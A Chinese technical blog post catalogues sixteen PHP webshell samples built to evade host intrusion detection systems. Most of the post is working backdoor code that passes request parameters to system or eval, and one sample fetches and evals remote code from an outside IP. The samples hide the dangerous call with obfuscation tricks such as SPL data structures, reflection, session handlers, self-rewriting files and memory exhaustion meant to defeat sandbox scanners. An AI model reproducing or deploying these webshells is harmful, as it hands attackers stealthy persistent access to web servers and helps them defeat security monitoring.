记一次学习--HIDS-phpwebshell绕过

最新推荐文章于 2024-10-02 23:04:10 发布
最新推荐文章于 2024-10-02 23:04:10 发布
阅读量1.4k 收藏 24
点赞数 22
文章标签: 学习 安全 渗透 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141815283
版权

目录

第一个样本

代码分析

结果

第二个样本

代码分析

结果

第三个样本

 结果

第四个样本

结果

 第五个样本

结果

第六个样本

结果

 第七个样本

结果

第八个样本(通过session绕过)

第九个样本

第十个样本

第十一个样本(自己改变自己)

第十二个样本

结果

第十三个样本(优先队列排序)

第十四个样本(内存不足)

原理 

​编辑

结果

第十五个样本

结果

第十六个样本

结果

不断学习,保持谦虚

第一个样本

<?php
$url="http://172.24.200.12/test/1.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_HTTPHEADER,$headerArray);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
eval($output);
system(whoami);

代码分析

这个样本是将1.txt的内容返回回来让eval执行

CURLOPT_URL: 设置要请求的 URL。
CURLOPT_SSL_VERIFYPEER: 禁用 SSL 证书验证。通常不建议这样做,因为这会降低安全性。
CURLOPT_SSL_VERIFYHOST: 禁用主机名验证。这也会降低安全性。
CURLOPT_RETURNTRANSFER: 设置 cURL 将结果返回为字符串,而不是直接输出。
CURLOPT_HTTPHEADER: 设置 HTTP 头。$headerArray 变量应该是一个包含 HTTP 头的数组,但在这段代码中没有提供具体的定义。

$output = curl_exec($ch);
curl_exec() 函数执行 cURL 会话,获取请求的结果并将其存储在 $output 变量中。
curl_close($ch);

结果

第二个样本

<?php
get_meta_tags("http://172.24.200.12/test/1.html")["author"](get_meta_tags("http://172.24.200.12test/1.html")["
keywords"]);
?>

1.txt

<!DOCTYPE html>
<html lang="en">
<head>
    <meta name="author" content="system">
<meta name="keywords" content="ls">
    <title>Document</title>
</head>
<body>
     
</body>
</html>

代码分析

结果

第三个样本

<?php
foreach(fpm_get_status()["procs"] as $val){
 system($val["query-string"]);
}

fpm_get_status() 是一个 PHP 函数,用于获取 PHP-FPM(FastCGI Process Manager)的状态信息。这个函数返回一个包含当前 PHP-FPM 状态的数组。这个数组通常包含有关当前进程的信息,如进程 ID、状态、请求等。

fpm_get_status打印如下,其中query-string是我们的老朋友了,他的值就是get传参的键值对

然后你在执行的时候可能是不同的进程,也就是你所在的数组可能是数组0也可能是数组1.所以在上面样本我们进行了一个for循环,循环出来就可以百分百执行命令

 结果

执行一些有空格的命令,那就抓包把里面的空格编码后的+再变成空格

第四个样本

<?php
$m=($GLOBALS[GLOBALS]*n[GLOBALS][GLOBALS][GLOBALS][GLOBALS][GLOBALS
][_GET][b]);
substr(timezone_version_get(),2)($m);

 这里通过$GLOBALS来传递命令,$GLOBALS打印如下,递归多次是因为HIDS对于递归的检测有点不足

通过timezone_version_get来获取system,timezone_version_get再php-fpm+nginx+linux下是如下值,其他环境有待测试

然后就可以执行了

结果

 第五个样本

<?php
$b = "111";
$c = "222";
if(get_cfg_var('error_reporting')>0){
 $b="#";
}
$a = array( "one"=>$c,"two"=>&$c );
$url = "http://172.24.200.12".$b."?a=1";
$d =parse_url($url);
if($d['query']){
 $c="echo 111;";
}
else{
 $c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
?>

get_cfg_var

parse_url

这个样本他最终是要执行eval。我们反着推导一下。要执行eval就要$a有值。要$a有值就要$c有值。$c有值就不可以进入这里,不然a的赋值就不对了。那样就需要$d的中query没有值才符合要求。经过测试$b=#的时候$d['query']为空。所以需要('error_reporting')>0也就是下面这一块

然后我们就需要构造一下

这个地方就可以绕过了,首席按准备一个文件上传的html,且属性为useraccount

然后上传文件,修改对应地方的值,成功绕过(这里paython写多了老是忘记php后面的;,调试了很久)

结果

第六个样本

<?php
$s= 
unserialize('a:2:{i:0;O:8:"stdClass":1:{s:1:"a";i:1;}i:1;r:2;}');
$c = "123";
$arr= get_declared_classes();
$i=0;
for($i;$i<count($arr);$i++){
 $i++;
 $s[1]->a=$_GET['a'];
 if($i<97 || $i>=98){
 continue;
 }
 $c=$s[0]->a;
 print(substr(get_declared_classes()[70],4,6)($c));
}
?>

先解释一下上面序列化的内容

有两个数组第一个数组是一个对象对象名字8个字符然后对象里面有个字符串a,然后第二个元素是引用前面的内容,第二个数组 ($s[1]) 的改变会影响第一个数组 ($s[0])。这是因为 $s[1] 是对 $s[0] 的引用(使用 r:2 表示),所以对 $s[1] 的任何修改也会反映到 $s[0] 上。这里干扰了HIDS。

get_declared_classes解释

 我们打印看一下get_declared_classes的值,我们发现在这里由system,然后我们可以使用substr截取出system

结果

 第七个样本

<?php
trait system{
}
$a= new JsonException($_GET['a']);
$c = "123";
$arr= getmygid();
$i=0;
for($i;$i<$arr;$i++){
 $i++;
//这里i的值和你的问价所属组有关系建议打印后在作判断
 if($i<32 || $i>33){
 continue;
 }
 $c=$a->getMessage();
 print(get_declared_traits()[0]($c));
}

getmyid

JsonException(不止JsonException支持getMessage方法,如果JsonException被禁用了可以尝试使用别的类)

get_declared_traits 将会获取到系统中已定义的 trait,因此获取到的函数名称为 system,而 JsonException ->getMessage() 能够将已储存的 Message 信息显示出来,这里如此初始化:$a= new JsonException($_GET['a']); 就可以绕过HIDS。

结果

第八个样本(通过session绕过)

<?php
$b = "111";
$c = "222";
session_start();

$a = array( "one"=>$c,"two"=>&$c );
$url = "http://a/usr/".$_SESSION['a']."?a=1";
$d =parse_url($url);
if($d['query']){
 $c="echo 111;";
}
else{
 $c=$_FILES['useraccount']['name'];
}
var_dump($a["two"]);
eval($a["two"]);
//这里的$_SESSION只要session_start一开启$_SESSION就会执行。
$_SESSION['a']="#";
?>

这里通过session来获取传递内容,其原理和第五个样本基本相同这里不做演示

第九个样本

<?php
ini_set("display_errors",1);
class MySessionHandler implements SessionHandlerInterface
{
 // implement interfaces here
 public function close()
 {
 // TODO: Implement close() method.
 }
 public function destroy($id)
 {
 // TODO: Implement destroy() method.
 }
 public function gc($max_lifetime)
 {
 // TODO: Implement gc() method.
 }
 public function open($path, $name)
 {
 $path($name);
 }
 public function read($id)
 {
 // TODO: Implement read() method.
 }
 public function write($id, $data)
 {
 // TODO: Implement write() method.
 }
}
$handler = new MySessionHandler();
session_set_save_handler($handler, true);
session_name($_GET[a]);
session_save_path('system');
session_start();

这里是码定义了一个自定义会话处理类,并设置为 PHP 的会话处理器。

这个代码在这里执行,然后$path和$name是我们传递的。然后就可以执行了

第十个样本

<?php
$a = new SplTempFileObject(1000000);
$a->fwrite( $_GET['a']);
$a->rewind();
substr(get_declared_classes()[70],4,6)($a->fgets());
//fgets() 从临时文件中读取一行数据。
?>
$a = new SplTempFileObject(1000000);

这行代码创建了一个临时文件对象 $a,其最大容量为 1000000 字节。SplTempFileObject 是一个 PHP 内置类,提供了对临时文件的操作接口。创建时传递的参数定义了文件的最大大小(以字节为单位)。

$a->rewind();

rewind() 方法将文件指针移动到文件的开头。这对于后续读取操作是必要的,因为数据已经写入到临时文件中,而现在我们需要从文件的开头读取数据。

第十一个样本(自己改变自己)

<?php
$s="Declaring file object\n";
$d=$_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];
$file = new SplFileObject($d,'w');
$file->fwrite("<?php"." eva".$s[3]);
$file->fwrite("(\$_"."GET"."[a]);?>");
include(get_included_files()[0]);
?>

使用 SplFileObject 创建一个文件对象 $file,并以写入模式 ('w') 打开文件。然后$file使用fwrite写入代码,如下代码执行过后被修改。然后使用include直接包含

第十二个样本

<?php
$obj=new SplMaxHeap();
$obj->insert( $_GET[a] );
$obj->insert( 8 );
$obj->insert( 'system' );
$obj->insert( 7 );
$obj->insert( 0 );
//$obj->recoverFromCorruption();
$i=0;
foreach( $obj as $number ) {
 $i++;
 if($i==1) {
 $a = $number;
 }
 if($i==2) {
 $b = $number;
 }
}
$a($b);

 提取插入过后obj变量的值,后命令执行,这里需要理解堆排序的原理,然后根据原理来选出$a和$b对应的值

结果

第十三个样本(优先队列排序)

<?php
ini_set("display_errors",1);
$objPQ = new SplPriorityQueue();
$objPQ->insert('m',1);
$objPQ->insert('s',7);
$objPQ->insert('e',3);
$objPQ->insert('s',5);
$objPQ->insert('y',6);
$objPQ->insert('t',$_GET[a]);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
//Go to TOP
$objPQ->top();
$m='';
$cur = new ErrorException($_GET[b]);
while($objPQ->valid()){
 $m.=$objPQ->current();
 $objPQ->next();
}
echo $m($cur->getMessage());
?>

 和第十二个差不多

当a等于4的时候$m可以拼成system函数,然后通过getMessage取出$_GET[b]

第十四个样本(内存不足)

<?php
ini_set("display_errors",1);
class b extends SplObjectStorage {
//SplObjectStorage 是 PHP 的一个 SPL(标准PHP库)类,用于存储对象,并允许对对象进行操作和管理
 public function getHash($o) {
 return get_class($o);
 }
}
$cur= new DomainException($_GET[a]);
//老朋友了传入message
?>
 111111111111111111111111111111111111111111111111
<?php
ini_set("display_errors",1);
ini_set("memory_limit","100G");
ini_set("memory_limit","100G");
 //将 PHP 的内存限制设置为 100 GB。这可以让脚本使用更多内存,但在实际应用中,设置如此大的内存限制是不常见的,并且可能会对服务器造成影响。
echo memory_get_usage().'<br>';
$var = str_repeat("php7_do9gy", 100000000);
//使用 str_repeat() 函数生成一个非常大的字符串,并将其赋值给 $var。这个操作会消耗大量内存,大概1G
echo memory_get_usage();
class bb{}?>
 111111111111111111111111111111111111111111111111
<?php
ini_set("display_errors",1);
class A {}
$s = new b;
$o2 = new stdClass;
$s[$o2] = 'system';
//these are considered equal to the objects before
//so they can be used to access the values stored under them
$p1 = new stdClass;
echo $s[$p1]($cur->getMessage());
?>

原理 

 查杀引擎的动态执行需要消耗内存空间,由于同一时间处理的样本 很多,因此单独给每个沙箱环境分配的内存往往不会太多,如果构造一个样本,能够让查杀引擎由于内存不足提前终止查杀,而在真实环境中内存可以满足执行需要,就能够执行到恶意的代码了,恰好 PHP 的内存申请是可以通过 php_ini 在运行时动态修改的。

动态查杀引擎在这里会内存不足,程序会在这里退出,但是真实环境可以满足执行需要

结果

第十五个样本

<?php
ini_set("display_errors",1);
function foo($test, $bar = FSYSTEM)
{
 echo $test . $bar;
}
$function = new ReflectionFunction('foo');
$q = new ParseError($_GET[a]);
foreach ($function->getParameters() as $param) {
 $da = new DateTime();
 echo $da->getTimestamp();
 echo 'Name: ' . $param->getName() . PHP_EOL;
 $n='F';
 if ($param->isOptional()) {
 if($da->getTimestamp()>=1725329100||$n='1'){
 echo $n;
 }
 echo 'Default value: ' . 
ltrim($param->getDefaultValueConstantName(),$n)($q->getMessage());
 }
 echo PHP_EOL;
}
?>

这里利用getTimestamp,再结合反射技巧

function foo($test, $bar = FSYSTEM): 定义一个函数 foo,接收两个参数 $test$bar,其中 $bar 有一个默认值 FSYSTEM。注意,这里的 FSYSTEM 应该是一个常量或类常量。

$function->getParameters(): 获取 foo 函数的参数列表,返回一个包含 ReflectionParameter 对象的数组。

if ($param->isOptional())检查参数是否可选

getParameters()ReflectionFunctionReflectionMethod 对象的一个方法,用于返回该函数或方法的参数列表。它返回一个 ReflectionParameter 对象的数组,每个对象表示一个参数的详细信息。你可以通过这些 ReflectionParameter 对象获取关于参数的名称、类型、默认值以及是否是可选的等信息。

ltrim($param->getDefaultValueConstantName(),$n): 从参数的默认值常量名中去掉前导的 $n

结果

第十六个样本

<?php
ini_set("display_errors",1);
function foo($test, $bar = FSYSTEM)
{
 echo $test . $bar;
}
$function = new ReflectionFunction('foo');
$q = new ParseError($_GET[a]);
$p = new ParseError($_SERVER[HTTP_A]);
foreach ($function->getParameters() as $param) {
 $da = new DateTime();
 echo $da->getTimestamp();
 echo 'Name: ' . $param->getName() . PHP_EOL;
 $n='F';
 if ($param->isOptional()) {
 if(mt_rand(55,$p->getMessage()??100)==55||$n='1'){
 echo $n;
 }
 echo 'Default value: ' . 
ltrim($param->getDefaultValueConstantName(),$n)($q->getMessage());
 }
 echo PHP_EOL;
}
?>

 if(mt_rand(55,$p->getMessage()??100)==55||$n='1')

生成一个 55 到 $p->getMessage() 或 100 之间的随机数。如果随机数等于 55 或 $n 被设置为 '1',则输出 $n

我们可以在$_SERVER[HTTP_A]传一个55,在这里mt_rand(55,$p->getMessage()就是55到55之间必选55

$_SERVER可以获取请求头部的信息,这里抓包添加一个HTTP_A的头部

结果

板栗妖怪
关注
OSSEC-hids 主机入侵检测系统概述
fured的博客
01-19 3405
随着国家对网络安全的重视,国内各个企业也开始在安全方面增加投入,我们公司也不例外。作为防守方,实时了解主机状态(主机文件是否被修改?是否有被入侵?等等)以及实时获取告警信息,是很重要的。及时反制入侵行为、及时修复系统,将入侵扼杀在摇篮阶段。于是引入了HIDS(主机入侵检测系统),网上关于HIDS的文章比较少、内容也不尽完善,下面是我自己在搭建HIDS时的录。 常用的主机入侵检测系统 AIDE(Advanced Intrusion Detection Environment):高级入侵检测环境,CIS
hids wazuh 系列1-安全运营
煜铭2011
09-17 743
Wazuh 是 以OSSEC作为引擎的基于主机的入侵检测系统,用于主机端点和云工作负载的统一XDR和SIEM保护。提供配置评估、扩展检测和响应、文件完整性监控、漏洞检测、威胁情报、日志数据分析、恶意软件检测、审计与合规、态势管理、工作负载保护、容器安全安全解决方案,此外可以与许多外部服务和工具集成。如VirusTotal,YARA,Amazon Macie,Slack和FortiGate。
一次学习--webshell防守理念
banliyaoguai的博客
09-01 363
source 检测输入源,输入源大部分是用户输入。一些像$_GET或者$_POST等污点追踪一直会追,只有当你程序报错或者经过了一个清洗函数污点追踪才不会追。
Centos7搭建ossec-hids2.8.3入侵检测系统
kadwf123的专栏
08-19 3998
1、故事背景,项目要求三级等保,大家懂的。 2、操作系统版本 [root@ossec01 yum.repos.d]# cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core) 3、安装wget 安装wget(如果有外网的话可以直接使用centos7安装后自带的yum源安装wget,没有外网使用本地安装镜像配置个本地源安装)...
主机安全-开源HIDS字节跳动Elkeid安装使用
关注网络安全、云原生安全
07-13 1914
HIDS( host-based intrusion detection system,基于主机的入侵检测系统),通过监测主机上的进程、文件、网络等信息来识别入侵风险。
hids wazuh 系列2- 规则管理
煜铭2011
09-16 802
Wazuh 是 以OSSEC作为引擎的基于主机的入侵检测系统,本文重点描述了wazuh规则,自定义规则,实现wazuh检测端口扫描、存在主机扫描的恶意内网行为的目标
hids wazuh 系列3-内网扫描规则
煜铭2011
01-18 1376
传统的入侵检测,主要分为网络入侵检测系统和主机入侵检测系统,分别作用于网络层面和主机(服务器、办公电脑等终端)。随着技术发展,出现了结合传统入侵检测系统和新技术(如数据分析、威胁情报、自动化操作、主动响应等)的新产品,这类新产品可能的名称是XDR、EDR、EPP等。Wazuh 是 以OSSEC作为引擎的基于主机的入侵检测系统,用于主机端点和云工作负载的统一XDR和SIEM保护。
HIDS-ebpf-0
0x00的博客
03-14 6353
背景 简单介绍ebpf最早就是从 tcpdump 中用作网络包过滤的经典 cbpf,到成为通用 Linux 内核技术的 eBPF,已经完成华丽蜕变,为应用与神奇的内核打造了一座桥梁,在系统跟踪、观测、性能调优、安全和网络等领域发挥重要的角色。很多技术都有用到ebpf; 如: Cilium,Faclo, DataDog等。 功能点 ebpf可以用来做什么呢?可以分两类: 网络运维: 网络负载均衡,加速网络(阿里有出过博客,详情见参考链接) 网络分流,其它还等个人脑洞 网络安全: 网络微隔离acl 防dd
AgentSmith-HIDS 使用与安装教程
gitblog_01041的博客
08-16 424
AgentSmith-HIDS 使用与安装教程 AgentSmith-HIDS项目地址:https://gitcode.com/gh_mirrors/ag/AgentSmith-HIDS 1. 项目目录结构及介绍 AgentSmith-HIDS 是一个面向云原生环境的主机入侵检测系统(Host-Based Intrusion Detection System, HIDS),旨在通过现代架构提供下...
ossec-debian:OSSEC HIDS Debian软件包
05-12
ossec-hids-agent:仅包含代理的软件包。 每个子目录包括: 补丁 Debian控制文件:changelog,compat,control,版权,lintian-overrides,postinst,postrm,preinst,规则 此外,还包括一个脚本generate_ossec....
ossec-hids-2.8.2.zip
06-22
**ossec-hids-2.8.2.zip** 是一个包含OSSEC主机入侵检测系统(Host-based Intrusion Detection System)的版本2.8.2的压缩包。OSSEC是一款开源的、多平台的HIDS,它能提供实时的系统监控、警报以及日志分析功能,...
使用 cgroups + etcd + kafka + netlink-connector 开发而成的hids的架构.zip
01-03
使用 cgroups + etcd + kafka + netlink-connector 开发而成的hids的架构,agent 部分使用go 开发而成, 会把采集的数据写入到kafka里面,由后端的规则引擎(go开发而成)消费,配置部分以及agent存活使用etcd。
ossec-hids-3.3.0-pcre2.tar.gz
08-22
综上所述,"ossec-hids-3.3.0-pcre2.tar.gz" 是一个包含OSSEC 3.3.0版本且集成PCRE2的压缩包,适用于那些希望在自己的服务器上部署强大且易于安装的HIDS解决方案的管理员。该压缩包不仅提供了源代码,还包含了快速...
10.2学习
2401_87363162的博客
10-02 1136
​ Spring AOP就是基于动态代理的,如果要代理的对象,实现了某个接⼝,那么Spring AOP会使⽤JDKProxy,去创建代理对象,⽽对于没有实现接⼝的对象,就⽆法使⽤ JDK Proxy 去进⾏代理了,这时候Spring AOP会使⽤基于asm框架字节流的Cglib动态代理 ,这时候Spring AOP会使⽤ Cglib ⽣成⼀个被代理对象的⼦类来作为代理。每个线程中都有一个自己的ThreadLocalMap类对象,可以将线程自己的对象保持到其中,各管各的,线程可以正确的访问到自己的对象。
从0学习React(3)
qq_54432917的博客
09-29 797
在第一篇文章中,我们对index.tsx文件的每一行代码都做了简单的分析。通过第一篇文章的总结,我也大致知道了index.tsx里的很多语法。而第二篇文章,我对index.tsx文件的框架做了一个大致的分析,通过第二篇文章,我对index.tsx有了进一步的认识。按理来讲,第三篇文章我还是解析index.tsx文件,但是我发现,对于前两篇文章,其实我对语法的细节有很多不明白的点。因此这篇文章,我就把React的一些最基础的知识给梳理一下,帮助我更好的理解index.tsx的代码。
Go基础学习10-原子并发包sync.atomic的使用:CSA、Swap、atomic.Value......
最新发布
FLJS_T的博客
10-02 951
原子操作sync.atomic以及原子变量atomic.Value详细介绍。go中原生的支持原子操作的函数支持的变量类型int32、int64、uint32、uint64、uintptr,以及unsafe包中的Pointer。对于上述原子操作类型中的每一个,可以支持的数据类型有:==int32、int64、uint32、uint64、uintptr,以及unsafe包中的Pointer。但是否sync.Mutex变量能够保证操作的原子性。atomic.Value类型是开箱即用的,我们声明一个该类型的变量
6.824 Lab 2C 学习
kingsill的博客
09-29 326
最后10s,开始的时候,恢复网络,插入一个数据,等待这个数据被提交,如果超过这10s就报错。2C的test中的unreliable figure8算是给博主的迎头一棒,需要根据raft论文的figure8进行解决,leader。根据前任及博主自己的经验,unreliable figure8的除了上述这一点以外,需要对。博主由于之前的不严谨,给自己留下了很大的改进困难,最后不得不重构代码。进行一定的设计,可以参考课程里老师提出的意见。一下为博主的github仓库,需要的可以参考。有一定的考验,那么就需要对。
【DirectX sdk 学习使用】
qq_41610493的博客
10-01 369
设置包含目录:打开你的项目属性,导航到VC++目录,然后在包含目录中添加DirectX SDK的Include文件夹路径。设置库目录:同样在VC++目录中,在库目录中添加DirectX SDK的Lib文件夹路径。运行安装程序:下载完成后,找到下载的安装程序(通常是一个.exe文件),双击运行。选择安装路径:选择你希望安装DirectX SDK的路径,或者使用默认路径。如果你有任何问题或需要进一步的指导,请随时告诉我。接受许可协议:在安装向导中,阅读并接受许可协议。完成安装:点击“安装”按钮,等待安装完成。
yum install atomic-sqlite
07-28
- *3* [OSSEC-hids 主机入侵检测系统概述](https://blog.csdn.net/fured/article/details/112221773)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值